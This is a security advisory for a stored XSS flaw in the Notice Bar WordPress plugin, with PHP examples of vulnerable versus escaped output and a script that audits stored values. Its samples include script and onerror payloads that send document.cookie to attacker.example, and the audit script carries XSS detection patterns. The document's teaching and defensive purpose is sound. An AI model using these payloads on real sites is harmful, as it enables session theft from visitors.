Impact
Local administrators (users holding the administrator role on the site) can create a notice bar entry whose text contains malicious markup or script. The value is stored in the database and rendered into the site's pages without output escaping, so the embedded script executes in the browser of every visitor who loads a page on which the notice is shown. The CVE description does not spell out the consequences; the usual outcomes of a stored XSS running in the site's own origin are theft of session cookies (where they are not marked HttpOnly), defacement and redirection of visitors, but these are inferred, not stated. The flaw is a classic stored XSS caused by improper neutralization of input during web page generation, classified as CWE-79.
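The following is an added illustration, not code from the Notice Bar plugin: a constructed notice value containing a script element, rendered once the way a CWE-79 sink renders it (concatenated into the page as-is) and once with output escaping. Function names, the sample notice text and the `attacker.example` host are assumptions; `esc_html()` is WordPress core's escaping helper, and the shim below only exists so the file also runs under the plain PHP CLI.

```php
<?php
// Added example (not the plugin's own code). Shows why storing the value is not
// the bug: the bug is emitting it into HTML without escaping at output time.

// WordPress core provides esc_html(); this shim is only for running outside WordPress.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed sample: the text an administrator could save as the notice.
$stored_notice = 'Maintenance tonight <script>'
    . 'document.location="https://attacker.example/?c="+document.cookie'
    . '</script>';

// VULNERABLE pattern: the stored value is dropped into the page verbatim, so the
// browser parses the <script> element and runs it for every visitor.
function render_notice_vulnerable(string $notice): string {
    return '<div class="notice-bar">' . $notice . '</div>';
}

// HARDENED pattern: escape in the HTML text context. The payload still sits in
// the database, but the browser receives &lt;script&gt;... and shows it as text.
function render_notice_hardened(string $notice): string {
    return '<div class="notice-bar">' . esc_html($notice) . '</div>';
}

echo "Vulnerable output:\n" . render_notice_vulnerable($stored_notice) . "\n\n";
echo "Hardened output:\n" . render_notice_hardened($stored_notice) . "\n";
```

If the notice is meant to carry limited formatting (links, bold text), `esc_html()` is too strict; WordPress's `wp_kses_post()` keeps the post-content tag allowlist and strips `<script>` and event-handler attributes. Applying the same filter when the value is saved (`sanitize_text_field()` or `wp_kses_post()`) adds defense in depth, but output escaping is the control that actually closes CWE-79.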
Affected Systems
The vulnerability is present in the WEN Solutions Notice Bar plugin for WordPress in all plugin versions up to and including 3.1.3; the CVE gives no lower bound, so every earlier release should be treated as affected. Any WordPress installation running a plugin version in that range, where users who can enter notice content (administrators, per the description) exist, is susceptible.
Risk and Exploitability
With a CVSS base score of 6.5, the flaw falls into the medium severity range. The EPSS score of less than 1% indicates a very low current probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog. The attack path implied by the description is an authenticated administrator creating or editing a notice entry that contains script; the stored payload is then served to every visitor of the pages on which the notice is displayed. Because the script runs in the site's own origin, anyone viewing those pages is affected, with session data exposure or content defacement as the plausible results. Two caveats matter for triage. First, the attacker must already hold administrator rights, so the realistic threat is a compromised or malicious administrator account; on single-site WordPress, administrators normally have the unfiltered_html capability anyway, whereas on multisite only super administrators do, which is where an admin-level stored XSS has real bite. Second, updating the plugin makes the renderer escape the value but does not remove a payload that was already stored, so existing notice entries should be reviewed after patching.
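Because the payload persists in the database, a practitioner patching this will want to check what is already stored. The following audit is an added example, not part of the advisory or the plugin: it flags option values that contain markup capable of executing in a visitor's browser. The plugin's actual option name is not given on this page, so the keys in the sample rows are constructed placeholders; in practice you would feed it values exported from the site (for example with WP-CLI's `wp option get <option_name>`). The pattern set and function names are assumptions.

```php
<?php
// Added example (not the plugin's own code): audit stored notice bar values for
// active HTML. Option names below are placeholders, not the plugin's real keys.

function find_active_content(string $html): array {
    // Each pattern targets one way of getting script execution from stored HTML.
    // "event_handler" will also flag harmless words like "online=", which is
    // acceptable for an audit that a human reviews.
    $patterns = [
        'script_tag'    => '/<\s*script\b/i',
        'event_handler' => '/\bon[a-z]+\s*=/i',
        'js_url'        => '/(href|src|action)\s*=\s*["\']?\s*javascript:/i',
        'embed_tag'     => '/<\s*(iframe|object|embed|svg|math)\b/i',
        'data_url'      => '/=\s*["\']?\s*data:text\/html/i',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $html)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function audit_options(array $options): array {
    $findings = [];
    foreach ($options as $name => $value) {
        // Also inspect the entity-decoded form, so a payload stored as
        // &lt;script&gt; is caught if some renderer decodes it before output.
        $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $hits = array_unique(array_merge(
            find_active_content($value),
            find_active_content($decoded)
        ));
        if ($hits) {
            $findings[$name] = array_values($hits);
        }
    }
    return $findings;
}

// Constructed sample rows, standing in for exported wp_options values.
$sample = [
    'example_notice_text'  => 'Site maintenance on Friday 22:00 UTC',
    'example_notice_text2' => 'Closing sale! <img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
    'example_notice_link'  => '<a href="javascript:alert(document.domain)">Details</a>',
];

foreach (audit_options($sample) as $name => $hits) {
    printf("%s: %s\n", $name, implode(', ', $hits));
}
```

Anything the audit flags should be removed or rewritten through the plugin's own settings screen rather than edited directly in the database, so that whatever sanitization the patched version applies on save is exercised as well.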